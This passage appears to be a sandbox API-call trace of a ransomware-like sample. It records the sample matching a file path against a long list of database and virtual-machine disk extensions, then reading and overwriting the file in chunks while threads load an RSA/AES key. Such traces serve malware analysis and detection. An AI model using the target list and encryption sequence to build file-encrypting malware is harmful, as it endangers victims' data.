(lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".pan") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".pdb") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".pdm") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".pnz") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".qry") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".qvd") returned 0x0 [0161.835] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rbf") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rctd") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rod") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rodx") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rpd") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".rsd") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sas7bdat") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sbf") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".scx") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sdb") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sdc") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sdf") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sis") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".spq") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sql") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sqlite") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sqlite3") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".sqlitedb") returned 0x0 [0161.836] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".te") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".temx") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".tmd") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".tps") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".trc") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".trm") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".udb") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".udl") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".usr") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".v12") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vis") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vpd") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vvv") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".wdb") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".wmdb") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".wrk") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".xdb") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".xld") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".xmlff") returned 0x0 [0161.837] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".abcddb") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".abs") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".abx") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".accdw") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".adn") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".db2") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".fm5") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".hjt") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".icg") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".icr") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".kdb") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".lut") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".maw") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mdn") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".mdt") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vdi") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vhd") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmdk") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".pvm") returned 0x0 [0161.838] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmem") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmsn") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmsd") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".nvram") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmx") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".raw") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".qcow2") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".subvol") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".bin") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vsv") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".avhd") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmrs") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vhdx") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".avdx") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".vmcx") returned 0x0 [0161.839] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".iso") returned 0x0 [0161.839] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.839] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0161.842] WriteFile (in: hFile=0x6cc, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0161.842] SetEndOfFile (hFile=0x6cc) returned 1 [0161.842] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.842] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0xc9c8e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0xc9c8e, lpOverlapped=0x0) returned 1 [0161.863] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfff36372, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.863] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xc9c8e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0xc9c8e, lpOverlapped=0x0) returned 1 [0161.865] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xc9c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.865] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0xc9c8e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.081] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfff36372, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.081] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xc9c8e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.086] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xc9c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.086] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0xc9c8e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.186] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfff36372, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.186] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xc9c8e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.188] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xc9c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.188] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0xc9c8e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.210] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfff36372, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.210] WriteFile (in: hFile=0x6cc, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0xc9c8e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc2c*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.214] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xc9c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.214] ReadFile (in: hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToRead=0xc9c8e, lpNumberOfBytesRead=0x3abfc80, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc80*=0xc9c8e, lpOverlapped=0x0) returned 1 [0162.362] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfff36372, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0162.362] WriteFile (hFile=0x6cc, lpBuffer=0x5030000, nNumberOfBytesToWrite=0xc9c8e, lpNumberOfBytesWritten=0x3abfc2c, lpOverlapped=0x0) Thread: id = 6 os_tid = 0xb0 [0055.536] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x5540000 [0055.536] CryptAcquireContextA (in: phProv=0x3bffcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3bffcf4*=0xed1438) returned 1 [0055.537] CryptImportKey (in: hProv=0xed1438, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x3bfff80 | out: phKey=0x3bfff80*=0xecf8e0) returned 1 [0055.537] Sleep (dwMilliseconds=0x1f4) [0060.637] Sleep (dwMilliseconds=0x1f4) [0069.842] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.844] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.874] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.419] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.448] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.131] Sleep (dwMilliseconds=0x1f4) [0084.694] Sleep (dwMilliseconds=0x1f4) [0085.209] Sleep (dwMilliseconds=0x1f4) [0085.800] Sleep (dwMilliseconds=0x1f4) [0086.315] Sleep (dwMilliseconds=0x1f4) [0086.830] Sleep (dwMilliseconds=0x1f4) [0087.352] Sleep (dwMilliseconds=0x1f4) [0087.859] Sleep (dwMilliseconds=0x1f4) [0088.600] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.561] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.532] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.202] Sleep (dwMilliseconds=0x1f4) [0094.738] Sleep (dwMilliseconds=0x1f4) [0095.239] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.268] Sleep (dwMilliseconds=0x1f4) [0096.800] Sleep (dwMilliseconds=0x1f4) [0097.313] Sleep (dwMilliseconds=0x1f4) [0097.836] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.945] Sleep (dwMilliseconds=0x1f4) [0101.461] Sleep (dwMilliseconds=0x1f4) [0101.995] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.011] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.110] Sleep (dwMilliseconds=0x1f4) [0107.736] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.403] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.605] Sleep (dwMilliseconds=0x1f4) [0111.338] Sleep (dwMilliseconds=0x1f4) [0111.859] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.132] Sleep (dwMilliseconds=0x1f4) [0113.690] Sleep (dwMilliseconds=0x1f4) [0114.286] Sleep (dwMilliseconds=0x1f4) [0114.804] Sleep (dwMilliseconds=0x1f4) [0115.737] Sleep (dwMilliseconds=0x1f4) [0116.253] Sleep (dwMilliseconds=0x1f4) [0116.946] Sleep (dwMilliseconds=0x1f4) [0117.515] Sleep (dwMilliseconds=0x1f4) [0118.030] Sleep (dwMilliseconds=0x1f4) [0118.545] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.746] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.805] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.844] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.377] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.572] Sleep (dwMilliseconds=0x1f4) [0128.218] Sleep (dwMilliseconds=0x1f4) [0128.732] Sleep (dwMilliseconds=0x1f4) [0129.247] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.380] Sleep (dwMilliseconds=0x1f4) [0130.916] Sleep (dwMilliseconds=0x1f4) [0131.431] Sleep (dwMilliseconds=0x1f4) [0131.945] Sleep (dwMilliseconds=0x1f4) [0132.619] Sleep (dwMilliseconds=0x1f4) [0136.999] Sleep (dwMilliseconds=0x1f4) [0137.532] Sleep (dwMilliseconds=0x1f4) [0138.062] Sleep (dwMilliseconds=0x1f4) [0139.453] Sleep (dwMilliseconds=0x1f4) [0140.056] Sleep (dwMilliseconds=0x1f4) [0140.575] Sleep (dwMilliseconds=0x1f4) [0141.144] Sleep (dwMilliseconds=0x1f4) [0141.668] Sleep (dwMilliseconds=0x1f4) [0142.413] Sleep (dwMilliseconds=0x1f4) [0142.927] Sleep (dwMilliseconds=0x1f4) [0143.493] Sleep (dwMilliseconds=0x1f4) [0144.128] Sleep (dwMilliseconds=0x1f4) [0144.689] Sleep (dwMilliseconds=0x1f4) [0145.190] Sleep (dwMilliseconds=0x1f4) [0145.704] Sleep (dwMilliseconds=0x1f4) [0146.220] Sleep (dwMilliseconds=0x1f4) [0146.806] Sleep (dwMilliseconds=0x1f4) [0147.311] Sleep (dwMilliseconds=0x1f4) [0147.893] Sleep (dwMilliseconds=0x1f4) [0148.428] Sleep (dwMilliseconds=0x1f4) [0148.985] Sleep (dwMilliseconds=0x1f4) [0149.560] Sleep (dwMilliseconds=0x1f4) [0150.073] Sleep (dwMilliseconds=0x1f4) [0150.712] Sleep (dwMilliseconds=0x1f4) [0151.370] Sleep (dwMilliseconds=0x1f4) [0151.882] Sleep (dwMilliseconds=0x1f4) [0152.435] Sleep (dwMilliseconds=0x1f4) [0152.943] Sleep (dwMilliseconds=0x1f4) [0153.457] Sleep (dwMilliseconds=0x1f4) [0154.148] Sleep (dwMilliseconds=0x1f4) [0154.867] Sleep (dwMilliseconds=0x1f4) [0155.991] Sleep (dwMilliseconds=0x1f4) [0156.885] Sleep (dwMilliseconds=0x1f4) [0157.641] Sleep (dwMilliseconds=0x1f4) [0158.251] Sleep (dwMilliseconds=0x1f4) [0158.793] Sleep (dwMilliseconds=0x1f4) [0159.405] Sleep (dwMilliseconds=0x1f4) [0159.931] Sleep (dwMilliseconds=0x1f4) [0160.502] Sleep (dwMilliseconds=0x1f4) [0161.055] Sleep (dwMilliseconds=0x1f4) [0161.571] Sleep (dwMilliseconds=0x1f4) Thread: id = 7 os_tid = 0x1c4 [0055.537] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x5a50000 [0055.538] CryptAcquireContextA (in: phProv=0x3d3fcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3d3fcf4*=0xed1ba0) returned 1 [0055.539] CryptImportKey (in: hProv=0xed1ba0, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x3d3ff80 | out: phKey=0x3d3ff80*=0xecf960) returned 1 [0055.539] Sleep (dwMilliseconds=0x1f4) [0060.638] Sleep (dwMilliseconds=0x1f4) [0069.843] Sleep (dwMilliseconds=0x1f4) [0070.518] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.073] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.845] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.875] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.419] Sleep (dwMilliseconds=0x1f4) [0080.933] Sleep (dwMilliseconds=0x1f4) [0081.449] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.139] Sleep (dwMilliseconds=0x1f4) [0084.694] Sleep (dwMilliseconds=0x1f4) [0085.209] Sleep (dwMilliseconds=0x1f4) [0085.800] Sleep (dwMilliseconds=0x1f4) [0086.315] Sleep (dwMilliseconds=0x1f4) [0086.830] 